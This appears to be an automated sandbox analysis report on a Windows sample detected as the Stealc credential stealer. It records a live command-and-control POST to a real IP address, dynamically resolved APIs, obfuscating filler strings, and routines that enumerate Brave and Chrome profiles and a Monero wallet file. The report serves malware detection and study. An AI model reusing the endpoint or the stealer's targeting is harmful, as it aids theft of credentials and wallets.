Sep 27, 2024 04:14:20.357491016 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHI Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HJEHIJEBKEBFBFHIIDHI--
Sep 27, 2024 04:14:21.082492113 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	22:13:59
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x540000
File size:	1'827'328 bytes
MD5 hash:	904925A03F5E62B7B67EE30D22E9C7CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2074330924.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00559860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,01270738), ref: 005598A1
GetProcAddress.KERNEL32(75900000,01270798), ref: 005598BA
GetProcAddress.KERNEL32(75900000,012705D0), ref: 005598D2
GetProcAddress.KERNEL32(75900000,01270750), ref: 005598EA
GetProcAddress.KERNEL32(75900000,01270768), ref: 00559903
GetProcAddress.KERNEL32(75900000,01278B40), ref: 0055991B
GetProcAddress.KERNEL32(75900000,01266760), ref: 00559933
GetProcAddress.KERNEL32(75900000,01266820), ref: 0055994C
GetProcAddress.KERNEL32(75900000,012705E8), ref: 00559964
GetProcAddress.KERNEL32(75900000,01270780), ref: 0055997C
GetProcAddress.KERNEL32(75900000,01270618), ref: 00559995
GetProcAddress.KERNEL32(75900000,012706C0), ref: 005599AD
GetProcAddress.KERNEL32(75900000,01266880), ref: 005599C5
GetProcAddress.KERNEL32(75900000,01270630), ref: 005599DE
GetProcAddress.KERNEL32(75900000,012707E0), ref: 005599F6
GetProcAddress.KERNEL32(75900000,01266900), ref: 00559A0E
GetProcAddress.KERNEL32(75900000,01270558), ref: 00559A27
GetProcAddress.KERNEL32(75900000,012708A0), ref: 00559A3F
GetProcAddress.KERNEL32(75900000,01266780), ref: 00559A57
GetProcAddress.KERNEL32(75900000,012708E8), ref: 00559A70
GetProcAddress.KERNEL32(75900000,012667A0), ref: 00559A88
LoadLibraryA.KERNEL32(012708D0,?,00556A00), ref: 00559A9A
LoadLibraryA.KERNEL32(01270918,?,00556A00), ref: 00559AAB
LoadLibraryA.KERNEL32(01270888,?,00556A00), ref: 00559ABD
LoadLibraryA.KERNEL32(01270870,?,00556A00), ref: 00559ACF
LoadLibraryA.KERNEL32(01270858,?,00556A00), ref: 00559AE0
GetProcAddress.KERNEL32(75070000,012708B8), ref: 00559B02
GetProcAddress.KERNEL32(75FD0000,01270900), ref: 00559B23
GetProcAddress.KERNEL32(75FD0000,01278EC8), ref: 00559B3B
GetProcAddress.KERNEL32(75A50000,01278C70), ref: 00559B5D
GetProcAddress.KERNEL32(74E50000,012668A0), ref: 00559B7E
GetProcAddress.KERNEL32(76E80000,01278A00), ref: 00559B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00559BB6

Strings

NtQueryInformationProcess, xrefs: 00559BAA

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
Instruction ID: 20cf7de71441e090b42239d53a9037580b2980235055d27f3fc788ab4f19a7f6
Opcode Fuzzy Hash: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
Instruction Fuzzy Hash: CAA16BB5580240BFF345EFA8ED889563BF9F79C701734C51BA605C3224D63DA852EB2A

Function 005445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0054460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0054479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544678

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 5c2d003b96a0748e823efe276a13fc5045838ce34485d275a7e5a3d8f9ef2ee2
Instruction ID: 7876d55928a0399e0936073da78a6279108772a298018c1c25277c2d31d1271b
Opcode Fuzzy Hash: 5c2d003b96a0748e823efe276a13fc5045838ce34485d275a7e5a3d8f9ef2ee2
Instruction Fuzzy Hash: BF41F7717D6E84FBC62CFBA4A94EE9DBB667F5E704FD07244E80853380FAB055108526

Function 0054BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

FindFirstFileA.KERNEL32(00000000,?,00560B32,00560B2B,00000000,?,?,?,005613F4,00560B2A), ref: 0054BEF5
StrCmpCA.SHLWAPI(?,005613F8), ref: 0054BF4D
StrCmpCA.SHLWAPI(?,005613FC), ref: 0054BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0054C7BF
FindClose.KERNEL32(000000FF), ref: 0054C7D1

Strings

Preferences, xrefs: 0054C11E
\Brave\Preferences, xrefs: 0054C1DB
Brave, xrefs: 0054C102
Google Chrome, xrefs: 0054C634

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: a72e8c76e76112f5a0cd170bf692b3dc8b3fe53c21a1557492e12ea0c66334b1
Instruction ID: a376b533160e8361919a632a0eec6438eb9fd25761e526e0633f112b21ee6eaa
Opcode Fuzzy Hash: a72e8c76e76112f5a0cd170bf692b3dc8b3fe53c21a1557492e12ea0c66334b1
Instruction Fuzzy Hash: 74425572910105ABDB14FB70DD6AEED7B3CBBC4301F408659B90697191EE34AB4DCB92

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
__aulldiv.LIBCMT ref: 6C6536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C653773
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C65377E
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6537C4
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6537CB
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C653801
__aulldiv.LIBCMT ref: 6C653883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C653902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C653918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C65394C

Strings

GenuntelineI, xrefs: 6C653639
GTC, xrefs: 6C653912
QPC, xrefs: 6C6538FC
MOZ_TIMESTAMP_MODE, xrefs: 6C6535DB
AuthcAMDenti, xrefs: 6C653946

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction ID: 14d1dd1505aced9cd8b45279eaef959e336740e5ad629c5ecbd62bb5e6e0c917
Opcode Fuzzy Hash: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction Fuzzy Hash: B0B1B4B1B083509FDB08DF2AC89461AB7F5EB8A700F15893DF499D3790D770A9018B8E

Function 00554910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0055492C
FindFirstFileA.KERNEL32(?,?), ref: 00554943
StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
FindClose.KERNEL32(000000FF), ref: 00554B92

Strings

%s\%s, xrefs: 005549FB
%s\%s, xrefs: 005549A4
%s\*, xrefs: 00554920

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
